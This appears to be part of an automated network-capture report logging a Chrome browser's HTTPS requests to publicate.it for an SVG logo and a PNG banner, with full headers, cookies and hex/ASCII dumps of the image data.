                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 22.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 64 3d 22 4d 31 36 36 2e 35 2c 30 68 31 37 63 30 2c 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 63 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 2c 30 63 30 2d 35 35 2e 35 2c 30 2d 31 31 31 2c 30 2d 31 36 36 2e 35 68 31 32 38 39 76 31 32 39 2e 35 0a 09 09 63 2d 31 31 2e 39 2c 30 2d 32 33 2e 38 2d 30 2e 31 2d 33 35 2e 36 2c 30 2e 31 63 2d 30 2e 33 2d 31 35 2c 30 2d 33 30 2e 31 2d 30 2e 31 2d 34 35 2e 31 63 2d 31 31 2e 39 2c 33 2e 36 2d 32 33 2e 37 2c 37 2e 34 2d 33 35 2e 36 2c 31 30 2e 38 63 2d 30 2e 33 2c 31 31 2e 34 2c 30 2c 32 32 2e 38 2d 30 2e 32 2c 33 34 2e 32 0a 09 09 63 2d 31 37 2e 36 2c 30 2d 33 35 2e 31 2c 30 2d 35 32 2e 37 2c 30 63 30 2e 32 2d 39 2d 30 2e 36 2d 31 38 2c 30 2e 37 2d 32 37 63 31 2e 31 2d 37 2c 35 2e 32 2d 31 34 2e
                                                                                                                                                                                                        Data Ascii: d="M166.5,0h17c0,55.5,0,111,0,166.5c55.5,0,111,0,166.5,0c0-55.5,0-111,0-166.5h1289v129.5c-11.9,0-23.8-0.1-35.6,0.1c-0.3-15,0-30.1-0.1-45.1c-11.9,3.6-23.7,7.4-35.6,10.8c-0.3,11.4,0,22.8-0.2,34.2c-17.6,0-35.1,0-52.7,0c0.2-9-0.6-18,0.7-27c1.1-7,5.2-14.
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 2c 37 2e 38 2c 31 34 2e 34 63 38 2e 36 2c 34 2e 38 2c 31 39 2e 35 2c 32 2e 37 2c 32 37 2e 34 2d 32 2e 36 76 32 39 2e 35 63 2d 31 30 2e 33 2c 34 2e 35 2d 32 31 2e 38 2c 35 2e 38 2d 33 32 2e 39 2c 35 0a 09 09 63 2d 31 30 2e 36 2d 30 2e 38 2d 32 31 2e 35 2d 34 2e 36 2d 32 38 2e 34 2d 31 33 63 2d 38 2d 39 2e 35 2d 31 30 2d 32 32 2e 33 2d 31 30 2e 32 2d 33 34 2e 34 63 2d 30 2e 31 2d 32 35 2e 38 2c 30 2d 35 31 2e 36 2c 30 2d 37 37 2e 34 63 2d 31 37 2e 36 2c 30 2d 33 35 2e 31 2c 30 2d 35 32 2e 37 2c 30 63 30 2c 34 30 2e 35 2c 30 2c 38 31 2c 30 2c 31 32 31 2e 35 0a 09 09 63 2d 31 32 2c 30 2d 32 34 2c 30 2d 33 36 2c 30 63 30 2d 34 30 2e 35 2d 30 2e 31 2d 38 31 2c 30 2d 31 32 31 2e 34 63 2d 38 2e 33 2d 30 2e 32 2d 31 36 2e 37 2c 30 2d 32 35 2e 31 2d 30 2e 31 63 30
                                                                                                                                                                                                        Data Ascii: ,7.8,14.4c8.6,4.8,19.5,2.7,27.4-2.6v29.5c-10.3,4.5-21.8,5.8-32.9,5c-10.6-0.8-21.5-4.6-28.4-13c-8-9.5-10-22.3-10.2-34.4c-0.1-25.8,0-51.6,0-77.4c-17.6,0-35.1,0-52.7,0c0,40.5,0,81,0,121.5c-12,0-24,0-36,0c0-40.5-0.1-81,0-121.4c-8.3-0.2-16.7,0-25.1-0.1c0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 2e 39 2c 30 2c 32 31 2e 37 2c 30 2e 31 2c 33 32 2e 36 63 2d 31 34 2e 37 2c 38 2e 38 2d 33 32 2e 34 2c 31 31 2d 34 39 2e 32 2c 31 30 2e 32 0a 09 09 63 2d 31 37 2e 32 2d 30 2e 39 2d 33 34 2e 34 2d 37 2e 34 2d 34 36 2e 39 2d 31 39 2e 36 63 2d 31 33 2e 36 2d 31 33 2e 31 2d 32 30 2e 39 2d 33 31 2e 37 2d 32 31 2e 38 2d 35 30 2e 34 63 2d 30 2e 39 2d 31 39 2e 34 2c 33 2e 31 2d 33 39 2e 37 2c 31 34 2e 32 2d 35 35 2e 39 43 37 39 39 2c 31 34 33 2e 37 2c 38 31 33 2e 36 2c 31 33 33 2e 39 2c 38 32 39 2e 36 2c 31 32 39 2e 33 0a 09 09 4c 38 32 39 2e 36 2c 31 32 39 2e 33 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 33 22 20 64 3d 22 4d 31 30 37 33 2e 35 2c 31 32 36 2e 38 63 31 37 2e 33 2d 32 2e 32 2c 33 35 2e 35 2d 31 2e 32 2c 35 31 2e 35 2c 36 2e 31 63
                                                                                                                                                                                                        Data Ascii: .9,0,21.7,0.1,32.6c-14.7,8.8-32.4,11-49.2,10.2c-17.2-0.9-34.4-7.4-46.9-19.6c-13.6-13.1-20.9-31.7-21.8-50.4c-0.9-19.4,3.1-39.7,14.2-55.9C799,143.7,813.6,133.9,829.6,129.3L829.6,129.3z"/><path class="st3" d="M1073.5,126.8c17.3-2.2,35.5-1.2,51.5,6.1c
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 37 2d 35 32 2e 33 63 32 2e 33 2d 31 37 2e 35 2c 31 30 2e 32 2d 33 34 2e 36 2c 32 33 2e 38 2d 34 36 2e 32 43 31 33 33 31 2e 38 2c 31 33 34 2e 31 2c 31 33 34 36 2e 31 2c 31 32 38 2e 36 2c 31 33 36 30 2e 36 2c 31 32 36 2e 37 4c 31 33 36 30 2e 36 2c 31 32 36 2e 37 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 33 22 20 64 3d 22 4d 39 37 33 2e 38 2c 31 33 31 2e 38 63 39 2e 39 2d 36 2c 32 32 2e 36 2d 36 2e 35 2c 33 33 2e 34 2d 32 2e 38 63 2d 30 2e 31 2c 31 32 2c 30 2c 32 34 2c 30 2c 33 36 63 2d 37 2e 31 2d 34 2e 36 2d 31 36 2d 36 2e 36 2d 32 34 2e 33 2d 35 2e 37 63 2d 31 30 2e 32 2c 31 2e 32 2d 31 38 2e 33 2c 39 2d 32 32 2e 35 2c 31 38 0a 09 09 63 2d 34 2e 36 2c 39 2e 35 2d 35 2e 34 2c 32 30 2e 33 2d 35 2e 31 2c 33 30 2e 37 63 30 2c 32 34 2c 30
                                                                                                                                                                                                        Data Ascii: 7-52.3c2.3-17.5,10.2-34.6,23.8-46.2C1331.8,134.1,1346.1,128.6,1360.6,126.7L1360.6,126.7z"/><path class="st3" d="M973.8,131.8c9.9-6,22.6-6.5,33.4-2.8c-0.1,12,0,24,0,36c-7.1-4.6-16-6.6-24.3-5.7c-10.2,1.2-18.3,9-22.5,18c-4.6,9.5-5.4,20.3-5.1,30.7c0,24,0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC296INData Raw: 36 30 33 2e 32 2c 31 39 32 2e 32 2c 31 36 30 33 2e 33 2c 31 37 35 2e 34 2c 31 36 30 33 2e 32 2c 31 35 38 2e 36 4c 31 36 30 33 2e 32 2c 31 35 38 2e 36 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 34 22 20 64 3d 22 4d 30 2c 31 38 33 2e 35 63 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 2c 30 63 30 2c 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 48 30 56 31 38 33 2e 35 4c 30 2c 31 38 33 2e 35 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 35 22 20 64 3d 22 4d 31 38 33 2e 35 2c 31 38 33 2e 35 63 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 2c 30 63 30 2c 35 35 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 36 36 2e 35 48 31 38 33 2e 35 43 31 38 33 2e 35 2c 32 39 34 2e 35 2c 31 38 33 2e 35 2c 32 33 39 2c 31 38
                                                                                                                                                                                                        Data Ascii: 603.2,192.2,1603.3,175.4,1603.2,158.6L1603.2,158.6z"/><path class="st4" d="M0,183.5c55.5,0,111,0,166.5,0c0,55.5,0,111,0,166.5H0V183.5L0,183.5z"/><path class="st5" d="M183.5,183.5c55.5,0,111,0,166.5,0c0,55.5,0,111,0,166.5H183.5C183.5,294.5,183.5,239,18


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        95192.168.2.549873104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC703OUTGET /images/home_banner.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 717659
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "af35b-620aa1d243e2f"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1wAGM09awIMhx%2FLxMlC%2F1xKEZr%2B07CyAnzsW2IPVhUQzJnKaOLjDmL9Q0N%2BSUm1hmK4QdbiXKlk2Cf9itg8SUHvOEcwoUKeqA6yWjLwCnN4N8cnHRzv3Xa7LBMDjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c93ca38c83-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC618INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 ac 00 00 05 04 08 06 00 00 00 30 11 57 be 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 38 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 02 a0 02 00 04 00 00 00 01 00 00 05 ac a0 03 00 04 00 00 00 01 00 00 05 04 00 00 00 00 20 ac 9a e0 00 00 40 00 49 44 41 54 78 01 ec dd 09 94 25 79 5d e0 fb 7f c4 dd f2 e6 52 59 7b 55 d7 d6 55 dd 55 dd 0d 0d 4d 77 75 01 a2 b2 39 22 0c 03 6e 07 41 1c 1d cf 7b cf 91 79 33 2e a0 e8 71 de 7b 73 c6 39 47 71 46 1b 65 75 7d e8 73 41 59 54 46 76 15 45 69 70 68 a8 ae 5e e8 86 86 5e aa 6b df 97 dc 6f de 25 e2 fd 7e f7 66 64 46 46 c5 bd 37 ee 1e 71 ef 37 20 2a 22 fe f1 5f 3f 51 9d 75 f3 97 ff fc 87 65 d8 10 40 00 01 04
                                                                                                                                                                                                        Data Ascii: PNGIHDR0WgAMAa8eXIfMM*i @IDATx%y]RY{UUUMwu9"nA{y3.q{s9GqFeu}sAYTFvEiph^^ko%~fdFF7q7 *"_?Que@
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 34 e8 0b 02 08 c4 49 80 c0 75 9c 9e 06 7d 41 00 81 44 0a f0 41 33 91 8f 8d 4e 23 80 00 02 08 20 80 00 02 08 20 30 10 01 be 7f 18 08 3b 8d 22 80 40 02 05 08 5c 27 f0 a1 d1 65 04 10 88 87 00 1f 38 e3 f1 1c e8 05 02 08 20 80 00 02 08 20 80 00 02 71 17 48 e2 f7 0e 49 ec 73 dc ff 1e d0 3f 04 06 25 90 c4 00 70 12 fb 3c a8 e7 4b bb 08 20 80 c0 aa 00 1f e0 56 29 38 41 00 01 04 10 40 00 01 04 10 40 00 81 10 81 b8 7f cf 10 f7 fe 85 90 92 84 00 02 5d 16 88 7b 60 38 ee fd eb f2 e3 a0 3a 04 10 40 a0 33 01 3e dc 75 e6 47 69 04 10 40 00 01 04 10 40 00 01 04 86 59 20 6e df 2f c4 ad 3f c3 fc ec 19 1b 02 49 17 88 5b 90 38 6e fd 49 fa f3 a5 ff 08 20 30 c4 02 7c e0 1b e2 87 cb d0 10 40 00 01 04 10 40 00 01 04 10 e8 40 20 0e df 2b c4 a1 0f 1d 10 52 14 01 04 62 24 10 87 80 71
                                                                                                                                                                                                        Data Ascii: 4Iu}ADA3N# 0;"@\'e8 qHIs?%p<K V)8A@@]{`8:@3>uGi@@Y n/?I[8nI 0|@@@ +Rb$q
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 06 26 d0 ad cf fe cd ea a9 77 3f 2c 3d 6a 9a 87 16 96 df bb e7 1d a3 e4 f1 f2 72 44 00 81 64 0a 44 09 e4 d6 cb d3 4a 7a 2b 79 3d c9 7a 65 bc fb ad 1c bb 59 57 2b ed 92 17 01 04 10 18 a8 00 1f e6 06 ca 4f e3 08 20 80 00 02 08 20 80 00 02 08 f4 45 a0 5b 9f fb 9b d5 13 76 3f 6a 9a 42 b4 92 d7 83 0b 2b e3 dd 6b e7 d8 ed fa da e9 03 65 10 18 76 81 6e 07 62 1b d5 57 ef 5e 58 7a d4 34 7d 3e 61 79 bd e7 d6 e8 9e 97 27 ca b1 5b f5 44 69 8b 3c 08 20 80 40 6c 04 f8 30 16 9b 47 41 47 10 40 00 01 04 10 40 00 01 04 10 e8 99 40 b7 3e f7 37 aa 27 ec 5e b7 d3 3c a0 b0 7a bd 7b fe 63 d4 7c fe 32 9c 23 80 40 3c 05 a2 06 6f eb e5 6b 25 3d 98 37 78 ed 09 d5 4b d7 fb 8d ee 79 e5 a3 1c bb 55 4f 94 b6 c8 83 00 02 08 c4 42 80 0f 70 b1 78 0c 74 02 01 04 10 40 00 01 04 10 40 00 81
                                                                                                                                                                                                        Data Ascii: &w?,=jrDdDJz+y=zeYW+O E[v?jB+kevnbW^Xz4}>ay'[Di< @l0GAG@@@>7'^<z{c|2#@<ok%=7xKyUOBpxt@@
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 3a 34 dd db bd 34 8e 08 20 30 fc 02 de 7f f7 8d be 36 04 15 82 79 fd d7 f5 ce 83 75 f8 af fd 65 fc e9 de 79 b3 fb 5e 3e 8e 08 20 80 00 02 3e 01 be 78 fa 30 38 45 00 01 04 10 40 00 01 04 10 40 60 88 04 da f9 ac 5f af 4c 30 dd 7f ed 3f 57 3e ff 75 ab e7 c1 f2 61 d7 9a a6 9b bf ee 5a 4a 6b 7f 76 5a be b5 d6 c8 8d 00 02 51 04 3a 9d 41 5c af 7c 30 bd d1 b5 ff 5e ab e7 3a 46 7f 99 b0 6b cf 21 98 cf 4b 6f 74 6c a7 4c a3 fa b8 87 00 02 08 c4 52 80 0f 69 b1 7c 2c 74 0a 01 04 10 40 00 01 04 10 40 00 81 8e 04 da fd 9c 1f 56 2e 98 d6 e8 da 7f af d5 73 1d b0 bf 4c d8 75 bd 34 4d 0f 6e c1 ba 82 f7 b9 46 00 81 64 09 b4 12 ac 0d cb 1b 4c 6b 74 ed bf d7 c9 b9 0a fb cb fb c5 eb a5 fb f3 04 cf db 29 13 ac 83 6b 04 10 40 20 f6 02 2c 09 12 fb 47 44 07 11 40 00 01 04 10 40 00
                                                                                                                                                                                                        Data Ascii: :44 06yuey^> >x08E@@`_L0?W>uaZJkvZQ:A\|0^:Fk!KotlLRi|,t@@V.sLu4MnFdLkt)k@ ,GD@@
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 40 00 81 d8 09 48 40 db 29 97 cb 8f 16 0a 4b f7 9f 3e 79 f2 93 47 ee 7e fe 03 03 e8 64 bd 80 75 30 dd 7f dd ec 3c ec 7e b3 34 1d 7a 58 1e 3f 89 ff be 3f 3d ec bc 95 bc 61 e5 49 43 00 01 04 62 2f b0 fa e1 33 f6 3d a5 83 08 20 80 00 02 08 20 80 00 02 08 20 10 45 a0 95 cf f8 61 79 83 69 d6 85 eb f3 af c8 e7 c7 fe 9d 65 d9 3f 60 5c 77 32 4a 27 c8 83 00 02 08 78 02 8e e3 1e 5f 58 98 ff f0 17 bf f8 4f 7f fa c6 ef ff fe 33 5e 7a 1f 8e 61 c1 dd 60 9a ff ba d9 79 d8 fd b0 34 1d 5a bd f4 e0 3d 8f c1 9f df 4b 0b 3b 46 cd 17 56 96 34 04 10 40 20 11 02 c1 0f a3 89 e8 34 9d 44 00 01 04 10 40 00 01 04 10 40 00 81 ba 02 ad 7c c6 0f cb 5b 4d 7b c5 2b 5e 61 7d ec d3 7f fb fa 54 2a f5 7f 59 c6 3a 52 b7 35 6e 20 80 00 02 11 05 64 e6 75 69 69 69 f1 c3 5f fd ca ff fa cd d7 be
                                                                                                                                                                                                        Data Ascii: @H@)K>yG~du0<~4zX??=aICb/3= Eayie?`\w2J'x_XO3^za`y4Z=K;FV4@ 4D@@|[M{+^a}T*Y:R5n duiii_
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: e5 c3 ae eb a5 69 7a 70 0b d6 15 bc cf 35 02 08 20 90 68 81 ba 1f 66 13 3d 2a 3a 8f 00 02 08 20 80 00 02 08 20 80 c0 e8 0a d4 fd 8c 3f bf 5c 79 87 44 39 7e a9 1d 9a a2 cc 9e 5c 5a 5a 30 b6 65 9b 8d 53 93 32 9b ba b3 99 93 ed f4 81 32 08 20 90 1c 01 9d 79 3d bb 58 30 73 f3 0b d5 e5 42 c6 c7 27 64 e9 10 59 2a a8 c5 4d 82 d6 cb 0f 3f f4 d0 ab be f3 c5 f7 3e da 62 51 7f f6 b0 00 6f 30 cd 7f 1d 76 de 49 9a f6 c5 5f 3e ec ba 5e 9a a6 07 b7 60 5d c1 fb 5c 23 80 00 02 89 16 48 25 ba f7 74 1e 01 04 10 40 00 01 04 10 40 00 01 04 82 02 a1 01 eb 99 42 f9 35 b6 6d ff b6 64 0e bd 1f ac c4 bb d6 a0 d3 fc fc 9c ac 51 bd 6c 36 4e 4e 9a cd d3 93 26 23 2f 5a 63 43 00 01 04 1a 09 e8 8b 19 c7 64 4d eb c9 89 bc 29 c9 3a d7 fa 75 44 d7 b5 d7 b5 ae 5b dc d2 db b7 ef 78 79 ca 54
                                                                                                                                                                                                        Data Ascii: izp5 hf=*: ?\yD9~\ZZ0eS22 y=X0sB'dY*M?>bQo0vI_>^`]\#H%t@@B5mdQl6NN&#/ZcCdM):uD[xyT
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 7c fd 75 7c 36 04 10 40 60 d0 02 9b 36 4c 98 a2 fc d6 47 d4 59 d6 db b6 6e 63 1d eb 41 3f 34 da 47 00 01 04 7a 20 40 c0 ba 07 a8 54 89 00 02 08 20 80 00 02 08 20 80 c0 a0 04 66 0b 85 db 5c e3 ee 8e d2 fe f2 f2 b2 99 1c cf 47 c9 4a 1e 04 10 40 a0 e7 02 29 79 01 63 2e 97 35 25 09 5a 47 d9 f2 f9 fc cb a2 e4 6b 23 0f 0b fa b7 81 46 11 04 10 40 a0 5b 02 04 ac bb 25 49 3d 08 20 80 00 02 08 20 80 00 02 08 c4 40 c0 75 d3 2f 8a d2 8d 4a a5 62 1c c7 31 e3 cc ae 8e c2 45 1e 04 10 e8 93 c0 44 3e 2f 6b eb 2f 47 6a 2d 9d 4e bf e0 ce 3b ef 4c 45 ca 4c 26 04 10 40 00 81 c4 08 10 b0 4e cc a3 a2 a3 08 20 80 00 02 08 20 80 00 02 08 34 17 b0 6d eb b6 e6 b9 8c 29 15 8b d5 99 8c 96 c5 44 c2 28 5e e4 41 00 81 fe 08 e8 0f d1 aa 3f 50 8b f0 f2 45 d7 75 33 bf f1 ae 77 dd dc 9f 9e
                                                                                                                                                                                                        Data Ascii: |u|6@`6LGYncA?4Gz @T f\GJ@)yc.5%ZGk#F@[%I= @u/Jb1ED>/k/Gj-N;LEL&@N 4m)D(^A?PEu3w
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 04 10 48 a8 80 3f 48 dd ab 60 b5 06 a9 0b 85 42 cb 33 aa c3 48 b5 bf 5e d0 5b ef 6b 20 5c 83 d8 b9 5c ae 67 c1 f6 b0 7e 90 86 00 02 08 20 80 00 02 f1 16 60 49 90 78 3f 1f 7a 87 00 02 08 20 80 00 02 08 20 80 00 02 08 84 0a f4 2a 48 ed 35 a6 01 e6 62 b1 d8 95 60 b5 57 a7 ff a8 f5 7b 2f 64 f4 a7 73 8e 00 02 08 20 80 00 02 a3 2d 40 c0 7a b4 9f 3f a3 47 00 01 04 10 40 00 01 04 10 40 00 81 21 10 d0 e0 6f b7 37 9d 01 ed 9f 11 5d af fe 4e da d6 a0 bb ce b2 66 43 00 01 04 10 40 00 01 04 3c 01 02 d6 9e 04 47 04 10 40 00 01 04 10 40 00 01 04 10 40 20 a1 02 bd 98 6d 1d 35 10 1d a5 ed 46 75 69 60 bc d1 fd 84 3e 12 ba 8d 00 02 08 20 80 00 02 6d 0a 10 b0 6e 13 8e 62 08 20 80 00 02 08 20 80 00 02 08 20 80 00 02 d1 04 1a 05 b5 6d db 66 0d eb 68 8c e4 42 00 01 04 10 40 60
                                                                                                                                                                                                        Data Ascii: H?H`B3H^[k \\g~ `Ix?z *H5b`W{/ds -@z?G@@!o7]NfC@<G@@@ m5Fui`> mnb mfhB@`
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 02 c6 b5 75 a2 7b da 75 3b 63 52 53 fb 8c 5b 78 be 31 85 d3 b2 be c7 bc 59 2a db a6 2c 01 ea 2b 73 ae f9 da e9 b2 c9 66 2c 93 92 4e 8c cb 7a d5 07 77 a4 4c 5e 8e 19 49 c8 e9 1f 13 7b 8c bd ed e5 c6 ca 6f 23 58 dd d3 07 45 e5 08 20 80 00 02 08 24 5b 80 80 75 b2 9f 1f bd 47 00 01 04 10 40 00 01 04 10 40 00 01 04 56 67 3a f7 9c c2 92 6f 21 37 dc 63 dc b9 af 9b ca cc 63 e6 c1 67 ca e6 c9 f3 8e 39 fa b4 6b 9e 38 eb 98 c9 31 ed 81 2c fd 21 b3 a7 5f 78 c0 31 77 ee b3 cd f3 f7 59 e6 e0 ae 71 89 62 1f 34 76 7e 17 c1 ea 9e 3f 24 1a 40 00 01 04 10 40 20 d9 02 04 ac 93 fd fc e8 3d 02 08 20 80 00 02 08 20 80 00 02 08 20 d0 73 81 75 4b 8f 64 37 49 f0 f9 56 63 cd 3d 6d f2 d9 05 73 75 ce 98 ed b2 c2 c7 6d 37 a5 cc a1 5d 96 b1 64 a5 8f 63 cf 38 c6 91 55 40 ae 2f 38 66 2a
                                                                                                                                                                                                        Data Ascii: u{u;cRS[x1Y*,+sf,NzwL^I{o#XE $[uG@@Vg:o!7ccg9k81,!_x1wYqb4v~?$@@ = suKd7IVc=msum7]dc8U@/8f*
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 1a db 0e 0b 71 87 14 27 09 01 04 10 40 00 01 04 86 4a 80 1f 5b 0f d5 e3 64 30 08 20 80 00 02 08 20 80 00 02 08 20 30 4a 02 dd 0a 56 ab 99 ae 55 5d 2c 16 5b e7 93 a8 74 41 ca ce 2d 14 24 68 5d 0b 54 7b ab 7a 58 12 88 f6 ce 6b 8b 82 84 55 5f 9b ab 2d 39 a5 fd b2 b9 70 65 d6 cc 2f 15 64 09 11 6f 0e 77 58 19 d2 10 40 00 01 04 10 40 60 58 05 08 58 0f eb 93 65 5c 08 20 80 00 02 08 20 80 00 02 08 20 30 32 02 61 cb 77 b4 32 78 5d ab 5a 97 02 69 77 cb c9 b2 20 f9 7c d6 a4 64 52 f4 fa be f8 67 59 eb 79 78 10 da 95 75 ae ab 9b 04 b8 4b c5 8a 99 99 95 97 38 ca 1a d7 6c 08 20 80 00 02 08 20 30 7a 02 04 ac 47 ef 99 33 62 04 10 40 00 01 04 10 40 00 01 04 10 18 32 81 4e 67 5a eb ec ea 7a c1 e4 28 54 3a 8b da d6 25 40 42 56 f1 58 9b 61 5d 6f 99 90 5a a1 5a 3e 39 97 98 f6
                                                                                                                                                                                                        Data Ascii: q'@J[d0 0JVU],[tA-$h]T{zXkU_-9pe/dowX@@`XXe\ 02aw2x]Ziw |dRgYyxuK8l 0zG3b@@2NgZz(T:%@BVXa]oZZ>9


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        96192.168.2.549874104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC699OUTGET /images/groupon.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC755INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 3474
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "d92-620aa1d20756b"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Ax%2BWtN%2Bm2Fsnqa%2FcnZhWl4BGqOFcy%2B8CvJmywCxqk6alKAyHdS8U0CVQ2VjNYpT5l7WDZJD4VF%2FS71cmUtaB7bAb46Emrm4iHSTGHroBbghG0RQ549cf%2BE1zuoxxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c94df541fe-EWR
